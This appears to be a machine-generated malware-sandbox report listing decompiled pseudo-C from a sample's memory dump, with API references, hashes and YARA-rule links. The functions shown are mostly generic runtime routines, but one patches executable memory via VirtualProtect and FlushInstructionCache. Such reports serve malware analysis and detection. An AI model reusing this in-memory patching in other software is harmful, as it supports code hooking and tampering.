Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID: XaB
API String ID: 4025006896-2044386368
Opcode ID: addd4cdde9af605aa3d7e116b0b2e01a18b5a711a6425cb1734425e58631475e
Instruction ID: 0f285f785c3965065d0e6245446e0c2136b53e017d75c0c962aa98d95ef97112
Opcode Fuzzy Hash: addd4cdde9af605aa3d7e116b0b2e01a18b5a711a6425cb1734425e58631475e
Instruction Fuzzy Hash: BC016171B44100BBDB00EBA8ACC1F9A3B98A709304F508276F904E73D2C639A840CBBD

Uniqueness

Uniqueness Score: -1.00%

Function 00401C34, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401C34() {
				intOrPtr* _v8;
				void* _t17;
				signed int _t19;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t34;

				_push(_t34);
				_push(E00401CFC);
				_push( *[fs:edx]);
				 *[fs:edx] = _t34;
				_push(0x4bc5cc);
				L0040140C();
				if( *0x4bc04d != 0) {
					_push(0x4bc5cc);
					L00401414();
				}
				E004014B0(0x4bc5ec);
				E004014B0(0x4bc5fc);
				E004014B0(0x4bc628);
				_t17 = LocalAlloc(0, 0xff8); // executed
				 *0x4bc624 = _t17;
				if( *0x4bc624 != 0) {
					_t19 = 3;
					do {
						_t29 =  *0x4bc624; // 0x262b80
						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
						_t19 = _t19 + 1;
					} while (_t19 != 0x401);
					_v8 = 0x4bc60c;
					 *((intOrPtr*)(_v8 + 4)) = _v8;
					 *_v8 = _v8;
					 *0x4bc618 = _v8;
					 *0x4bc5c4 = 1;
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E00401D03);
				if( *0x4bc04d != 0) {
					_push(0x4bc5cc);
					L0040141C();
					return 0;
				}
				return 0;
			}

0x00401c3a
0x00401c3b
0x00401c40
0x00401c43
0x00401c46
0x00401c4b
0x00401c57
0x00401c59
0x00401c5e
0x00401c5e
0x00401c68
0x00401c72
0x00401c7c
0x00401c88
0x00401c8d
0x00401c99
0x00401c9b
0x00401ca0
0x00401ca0
0x00401ca8
0x00401cac
0x00401cad
0x00401cb4
0x00401cc1
0x00401cca
0x00401ccf
0x00401cd4
0x00401cd4
0x00401cdd
0x00401ce0
0x00401ce3
0x00401cef
0x00401cf1
0x00401cf6
0x00000000
0x00401cf6
0x00401cfb

APIs

RtlInitializeCriticalSection.KERNEL32(004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C4B
RtlEnterCriticalSection.KERNEL32(004BC5CC,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C5E
LocalAlloc.KERNEL32(00000000,00000FF8,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C88
RtlLeaveCriticalSection.KERNEL32(004BC5CC,00401D03,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401CF6

Strings

dA&, xrefs: 00401C6D

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: dA&
API String ID: 730355536-2347778391
Opcode ID: 4e82e0472d2ad88d837138ab471f0bd350aa74d59a910c41fdf11f543da87940
Instruction ID: 7ced40d00289cef8c72374ed276ec3ce5776550f776a390a69df997d010786a5
Opcode Fuzzy Hash: 4e82e0472d2ad88d837138ab471f0bd350aa74d59a910c41fdf11f543da87940
Instruction Fuzzy Hash: F5118F70648610AFE725EB69D9C5B6A7BE4EB88304F10817BF440A73F1C67CAD40CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00460154, Relevance: 7.7, APIs: 5, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00460154(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				int _t100;
				int _t102;
				intOrPtr _t119;
				int _t124;
				intOrPtr _t157;
				signed char _t165;
				signed char _t166;
				void* _t168;
				signed char _t183;
				intOrPtr _t185;
				intOrPtr _t197;
				void* _t200;
				void* _t202;
				int _t203;
				intOrPtr _t207;
				void* _t209;
				signed char _t210;

				_t200 = __edi;
				_t206 = _t207;
				_t202 = __edx;
				_v8 = __eax;
				E00449E20(_v8);
				_push(_t207);
				_push(0x4603bc);
				_push( *[fs:edx]);
				 *[fs:edx] = _t207;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t168 = 0;
				_t209 = E00403598( *_v8) -  *0x45cfc0; // 0x45d00c
				if(_t209 == 0) {
					_t165 =  *0x4bc665; // 0x0
					_t166 = _t165 ^ 0x00000001;
					_t210 = _t166;
					 *(_v8 + 0x234) = _t166;
				}
				E0044957C(_v8, _t168, _t202, _t210); // executed
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L14:
					_t100 =  *(_v8 + 0x268);
					_t219 = _t100;
					if(_t100 > 0) {
						E00446760(_v8, _t100, _t200, _t219);
					}
					_t102 =  *(_v8 + 0x26c);
					_t220 = _t102;
					if(_t102 > 0) {
						E004467A4(_v8, _t102, _t200, _t220);
					}
					_t183 =  *0x4603c8; // 0x0
					 *(_v8 + 0x98) = _t183;
					_t221 = _t168;
					if(_t168 == 0) {
						E0045F7B4(_v8, 1, 1);
						E0044D054(_v8, 1, 1, _t221);
					}
					E00447F3C(_v8, 0, 0xb03d, 0);
					_pop(_t185);
					 *[fs:eax] = _t185;
					_push(0x4603c3);
					return E00449E28(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t197 =  *0x4bcb80; // 0x1c40e90
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t197 + 0x40))) {
							_t157 =  *0x4bcb80; // 0x1c40e90
							E00428678( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00428670( *((intOrPtr*)(_v8 + 0x68))),  *(_t157 + 0x40),  *(_v8 + 0x25c)), _t200, _t206);
						}
					}
					_t119 =  *0x4bcb80; // 0x1c40e90
					 *(_v8 + 0x25c) =  *(_t119 + 0x40);
					_t203 = E004604EC(_v8);
					_t124 =  *(_v8 + 0x270);
					_t215 = _t203 - _t124;
					if(_t203 != _t124) {
						_t168 = 1;
						E0045F7B4(_v8, _t124, _t203);
						E0044D054(_v8,  *(_v8 + 0x270), _t203, _t215);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t203,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t203,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t203,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t203,  *(_v8 + 0x270));
						}
					}
					goto L14;
				}
			}

0x00460154
0x00460155
0x0046015a
0x0046015c
0x00460162
0x00460169
0x0046016a
0x0046016f
0x00460172
0x0046017a
0x00460185
0x00460190
0x00460196
0x004601a2
0x004601a8
0x004601aa
0x004601af
0x004601af
0x004601b4
0x004601b4
0x004601bf
0x004601ce
0x00460330
0x00460333
0x00460339
0x0046033b
0x00460342
0x00460342
0x0046034a
0x00460350
0x00460352
0x00460359
0x00460359
0x00460361
0x00460367
0x0046036d
0x0046036f
0x0046037e
0x00460390
0x00460390
0x004603a1
0x004603a8
0x004603ab
0x004603ae
0x004603bb
0x004601e4
0x004601ee
0x004601f9
0x00460202
0x0046020e
0x0046022e
0x0046022e
0x00460202
0x00460233
0x0046023e
0x0046024c
0x00460251
0x00460257
0x00460259
0x0046025f
0x00460268
0x0046027b
0x0046028a
0x004602a9
0x004602a9
0x004602b9
0x004602d8
0x004602d8
0x004602e8
0x00460307
0x0046032a
0x0046032a
0x004602e8
0x00000000
0x00460259

APIs

MulDiv.KERNEL32 ref: 00460225
MulDiv.KERNEL32 ref: 004602A1
MulDiv.KERNEL32 ref: 004602D0
MulDiv.KERNEL32 ref: 004602FF
MulDiv.KERNEL32 ref: 00460322

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f640e6d0cf5c664c45284156540a415d032844f1db2cbfa75cbbfb1605bb14ca
Instruction ID: 6a55c8ea9dfba38a169bb315944962558cb9d6f58a87ed62a57e18c3e94021f4
Opcode Fuzzy Hash: f640e6d0cf5c664c45284156540a415d032844f1db2cbfa75cbbfb1605bb14ca
Instruction Fuzzy Hash: 0771E534A04104EFDB04DBA9C589EAEB7F5AF49304F2541F5E808DB362D735AE45DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00438864, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00438864(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x4389ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E004046A0( &_v8, 0x4389d0);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E00449070(_t76, _t93, _t104);
				E004293D8( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E00404698(_v8);
					_t42 = E00404898(_v8);
					DrawTextA(E004294DC( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94); // executed
				} else {
					OffsetRect(_t91, 1, 1);
					E00428490( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000014);
					_t54 = E00404698(_v8);
					_t56 = E00404898(_v8);
					DrawTextA(E004294DC( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E00428490( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000010);
					_t65 = E00404698(_v8);
					_t67 = E00404898(_v8);
					DrawTextA(E004294DC( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x4389c1);
				return E004043D8( &_v8);
			}

0x00438867
0x0043886c
0x0043886e
0x00438870
0x00438874
0x00438875
0x0043887a
0x0043887d
0x00438887
0x00438893
0x004388bd
0x004388bd
0x004388c9
0x004388cb
0x004388cb
0x004388da
0x004388e5
0x004388f3
0x00438984
0x0043898d
0x0043899f
0x004388f9
0x004388fe
0x00438911
0x0043891b
0x00438924
0x00438936
0x00438940
0x00438953
0x0043895d
0x00438966
0x00438978
0x00438978
0x004389a6
0x004389a9
0x004389ac
0x004389b9

APIs

OffsetRect.USER32 ref: 004388FE
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00438936
OffsetRect.USER32 ref: 00438940
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00438978
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0043899F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$OffsetRect
String ID:
API String ID: 1886049697-0
Opcode ID: d5d296c7d19f9f45e0ef83a316c6e3301e82849a25fdc707f22b2e1ed48eed5b
Instruction ID: 74dd78a86579deff2084849f8f1fd9dce51f18be79d7683dccd305a5bd4a35e2
Opcode Fuzzy Hash: d5d296c7d19f9f45e0ef83a316c6e3301e82849a25fdc707f22b2e1ed48eed5b
Instruction Fuzzy Hash: 48318670A04204AFDB11FB69CC85B9FB7E8AF49314F5540BAB808E7296CB7D9D049629

Uniqueness

Uniqueness Score: -1.00%

Function 0049E878, Relevance: 6.1, APIs: 4, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0049E878(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t3;
				void* _t9;
				void* _t15;
				long _t16;
				DWORD* _t17;

				_push(__ecx);
				_t16 = __ecx;
				_t15 = __edx;
				_t9 = __eax;
				_t3 = VirtualProtect(__eax, __ecx, 0x40, _t17); // executed
				if(_t3 != 0) {
					0;
					0;
					0;
					E00402D04(_t15, _t16, _t9);
					FlushInstructionCache(GetCurrentProcess(), _t9, _t16);
					_t3 = VirtualProtect(_t9, _t16, _v16, _t17);
				}
				return _t3;
			}

0x0049e87b
0x0049e87c
0x0049e87e
0x0049e880
0x0049e888
0x0049e88f
0x0049e897
0x0049e89b
0x0049e89f
0x0049e8a7
0x0049e8b4
0x0049e8c1
0x0049e8c1
0x0049e8ca

APIs

VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000005,?,?,004BCDC0,0049E911), ref: 0049E888
GetCurrentProcess.KERNEL32(00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,004BCDC0,0049E911), ref: 0049E8AE
FlushInstructionCache.KERNEL32 ref: 0049E8B4
VirtualProtect.KERNEL32(00000000,00000005,000000E9,?,00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,004BCDC0,0049E911), ref: 0049E8C1

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 4115577372-0
Opcode ID: 849760c5000c0cbf7580439b16a1565490b3060bdeaf84e031cadab66409ab62
Instruction ID: d2ff559206eff8e6b84761999227fd00e5f6a7341208938c852852a44592174c
Opcode Fuzzy Hash: 849760c5000c0cbf7580439b16a1565490b3060bdeaf84e031cadab66409ab62
Instruction Fuzzy Hash: 21E0129130622036D524726B5D85D9B5E8DCED6774701543AB50AF3283C97DCC1140B9

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA44, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0043DA44(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				int _t17;
				intOrPtr _t18;
				void* _t23;
				void* _t24;
				intOrPtr _t28;
				int _t32;
				intOrPtr _t35;

				_t24 = __ecx;
				_push(0);
				_t23 = __eax;
				_push(_t35);
				_push(0x43dac3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				KillTimer( *(__eax + 0x34), 1);
				_t32 =  *(_t23 + 0x30);
				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0) {
					_t17 = SetTimer( *(_t23 + 0x34), 1, _t32, 0); // executed
					if(_t17 == 0) {
						_t18 =  *0x4bb220; // 0x426454
						E0040656C(_t18, _t24,  &_v8);
						E0040CAC4(_v8, 1);
						E00403DEC();
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(0x43daca);
				return E004043D8( &_v8);
			}

0x0043da44
0x0043da47
0x0043da4b
0x0043da4f
0x0043da50
0x0043da55
0x0043da58
0x0043da61
0x0043da66
0x0043da6b
0x0043da83
0x0043da8a
0x0043da8f
0x0043da94
0x0043daa3
0x0043daa8
0x0043daa8
0x0043da8a
0x0043daaf
0x0043dab2
0x0043dab5
0x0043dac2

APIs

KillTimer.USER32 ref: 0043DA61
SetTimer.USER32(?,00000001,?,00000000), ref: 0043DA83

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

Strings

TdB, xrefs: 0043DA8F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer$KillLoadString
String ID: TdB
API String ID: 1423459280-230150497
Opcode ID: cc2accabe9787aadf79198a753a5bd9566ad5780803869af54555132eba7f4c2
Instruction ID: 62567be880da1182807cb4c6962a5b0457812c0d356ab9ad02987b2bec6cc087
Opcode Fuzzy Hash: cc2accabe9787aadf79198a753a5bd9566ad5780803869af54555132eba7f4c2
Instruction Fuzzy Hash: 7801B531A04204AFDB10FF65DD82B5637ACEB48B14F4110A6FD009B2D2D2B9AD40C658

Uniqueness

Uniqueness Score: -1.00%

Function 0042FEAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042FEAC(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;

				_t8 = _a4;
				if( *0x4bc92c == 0) {
					 *0x4bc904 = E0042FDB8(0, _t8, "GetSystemMetrics",  *0x4bc904, _t17);
					_t7 =  *0x4bc904(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

0x0042feb0
0x0042feba
0x0042fece
0x0042fed4
0x00000000
0x0042fed4
0x0042fedc
0x0042fee4
0x0042fee4
0x0042fee7
0x0042fefb
0x0042fee9
0x0042fee9
0x0042feff
0x0042feeb
0x0042feeb
0x0042feeb
0x0042feec
0x0042ff03
0x0042feee
0x0042feef
0x0042fef2
0x0042fef4
0x0042fef4
0x0042fef2
0x0042feec
0x0042fee9
0x0042ff08
0x0042ff0b
0x0042ff15
0x0042ff0d
0x00000000
0x0042ff0e

APIs

GetSystemMetrics.USER32 ref: 0042FF0E

Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C

KiUserCallbackDispatcher.NTDLL ref: 0042FED4

Strings

GetSystemMetrics, xrefs: 0042FEBC

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: 31b34adb3dd180f2973adf22d334e837596a601fc61411ebd5de6f19a5422a6e
Instruction ID: daf23ffb7eba0a7573a5df445ea76db764a797a6bf5cd916b578ff44d543b6d6
Opcode Fuzzy Hash: 31b34adb3dd180f2973adf22d334e837596a601fc61411ebd5de6f19a5422a6e
Instruction Fuzzy Hash: 65F096707251244BDB101A34BEC4A3735659787334FE2873BFA12866E9C57C984D921D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D364, Relevance: 4.6, APIs: 3, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040D364(void* __eax, void* __ebx, void* __ecx) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t27;
				void* _t37;
				intOrPtr _t43;
				void* _t48;
				void* _t49;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t59;
				void* _t60;
				intOrPtr _t61;

				_t49 = __ecx;
				_t59 = _t60;
				_t61 = _t60 + 0xffffffe8;
				_v12 = 0;
				_push(_t59);
				_push(0x40d43a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61;
				_v8 = 0xffffffff;
				_t55 = __eax;
				E00404470( &_v12, __eax);
				E004048E8( &_v12);
				_push( &_v16);
				_t27 = E00404898(_v12);
				_push(_t27); // executed
				L00406CE4(); // executed
				_t48 = _t27;
				if(_t48 == 0) {
					_pop(_t56);
					 *[fs:eax] = _t56;
					_push(E0040D441);
					return E004043D8( &_v12);
				} else {
					_v20 = E00402AE4(_t48, _t49, _t55);
					_push(_t59);
					_push(0x40d41d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					_push(_v20);
					_push(_t48);
					_push(_v16);
					_t37 = E00404898(_v12);
					_push(_t37); // executed
					L00406CDC(); // executed
					if(_t37 != 0) {
						_push( &_v28);
						_push( &_v24);
						_push(E0040D44C);
						_t43 = _v20;
						_push(_t43);
						L00406CEC();
						if(_t43 != 0) {
							_v8 =  *((intOrPtr*)(_v24 + 8));
						}
					}
					_pop(_t57);
					 *[fs:eax] = _t57;
					_push(0x40d424);
					return E00402B14(_v20);
				}
			}

0x0040d364
0x0040d365
0x0040d367
0x0040d36d
0x0040d374
0x0040d375
0x0040d37a
0x0040d37d
0x0040d380
0x0040d38a
0x0040d38c
0x0040d394
0x0040d39c
0x0040d3a0
0x0040d3a5
0x0040d3a6
0x0040d3ab
0x0040d3af
0x0040d426
0x0040d429
0x0040d42c
0x0040d439
0x0040d3b1
0x0040d3b8
0x0040d3bd
0x0040d3be
0x0040d3c3
0x0040d3c6
0x0040d3cc
0x0040d3cd
0x0040d3d1
0x0040d3d5
0x0040d3da
0x0040d3db
0x0040d3e2
0x0040d3e7
0x0040d3eb
0x0040d3ec
0x0040d3f1
0x0040d3f4
0x0040d3f5
0x0040d3fc
0x0040d404
0x0040d404
0x0040d3fc
0x0040d409
0x0040d40c
0x0040d40f
0x0040d41c
0x0040d41c

APIs

73211C9C.VERSION(00000000,?,00000000,0040D43A), ref: 0040D3A6
73211CED.VERSION(00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3DB
73211B72.VERSION(?,0040D44C,?,?,00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3F5

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: 73211
String ID:
API String ID: 2278683314-0
Opcode ID: 60b0c64f81e096c9efbd4ab5870f46e5c527d8ad74a565125164eb61d3377cc9
Instruction ID: 0c1de86a5a6b2bd8f79132c246a7c769ae6bbc625a861bd60d69dd3460cca180
Opcode Fuzzy Hash: 60b0c64f81e096c9efbd4ab5870f46e5c527d8ad74a565125164eb61d3377cc9
Instruction Fuzzy Hash: 5A213CB5A04649AFDB10EFE5CC818AEB7FCEB48704B528476B500F36D1D738A905CA28

Uniqueness

Uniqueness Score: -1.00%

Function 0040D362, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040D362(void* __eax, void* __ebx) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t27;
				void* _t37;
				intOrPtr _t43;
				void* _t48;
				void* _t49;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t59;
				void* _t60;
				intOrPtr _t61;

				_t59 = _t60;
				_t61 = _t60 + 0xffffffe8;
				_v12 = 0;
				_push(_t59);
				_push(0x40d43a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61;
				_v8 = 0xffffffff;
				_t55 = __eax;
				E00404470( &_v12, __eax);
				E004048E8( &_v12);
				_push( &_v16);
				_t27 = E00404898(_v12);
				_push(_t27); // executed
				L00406CE4(); // executed
				_t48 = _t27;
				if(_t48 == 0) {
					_pop(_t56);
					 *[fs:eax] = _t56;
					_push(E0040D441);
					return E004043D8( &_v12);
				} else {
					_v20 = E00402AE4(_t48, _t49, _t55);
					_push(_t59);
					_push(0x40d41d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					_push(_v20);
					_push(_t48);
					_push(_v16);
					_t37 = E00404898(_v12);
					_push(_t37); // executed
					L00406CDC(); // executed
					if(_t37 != 0) {
						_push( &_v28);
						_push( &_v24);
						_push(E0040D44C);
						_t43 = _v20;
						_push(_t43);
						L00406CEC();
						if(_t43 != 0) {
							_v8 =  *((intOrPtr*)(_v24 + 8));
						}
					}
					_pop(_t57);
					 *[fs:eax] = _t57;
					_push(0x40d424);
					return E00402B14(_v20);
				}
			}

0x0040d365
0x0040d367
0x0040d36d
0x0040d374
0x0040d375
0x0040d37a
0x0040d37d
0x0040d380
0x0040d38a
0x0040d38c
0x0040d394
0x0040d39c
0x0040d3a0
0x0040d3a5
0x0040d3a6
0x0040d3ab
0x0040d3af
0x0040d426
0x0040d429
0x0040d42c
0x0040d439
0x0040d3b1
0x0040d3b8
0x0040d3bd
0x0040d3be
0x0040d3c3
0x0040d3c6
0x0040d3cc
0x0040d3cd
0x0040d3d1
0x0040d3d5
0x0040d3da
0x0040d3db
0x0040d3e2
0x0040d3e7
0x0040d3eb
0x0040d3ec
0x0040d3f1
0x0040d3f4
0x0040d3f5
0x0040d3fc
0x0040d404
0x0040d404
0x0040d3fc
0x0040d409
0x0040d40c
0x0040d40f
0x0040d41c
0x0040d41c

APIs

73211C9C.VERSION(00000000,?,00000000,0040D43A), ref: 0040D3A6
73211CED.VERSION(00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3DB
73211B72.VERSION(?,0040D44C,?,?,00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3F5

Memory Dump Source

